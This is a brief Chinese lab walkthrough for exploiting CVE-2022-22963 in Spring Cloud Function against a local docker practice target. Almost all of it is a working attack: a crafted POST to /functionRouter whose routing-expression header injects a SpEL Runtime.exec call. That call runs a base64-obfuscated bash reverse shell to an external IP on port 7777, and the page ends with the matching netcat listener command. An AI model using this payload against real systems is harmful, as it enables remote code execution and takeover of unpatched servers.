1.执行以下命令启动靶场环境并在浏览器访问
cd spring/CVE-2022-22963
docker-compose up -d
docker ps
2.反弹shell
构造payload
页面刷新抓包,修改内容
POST /functionRouter HTTP/1.1
Host: 192.168.0.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8
test
开启监听,执行反弹
nc -lvvp 7777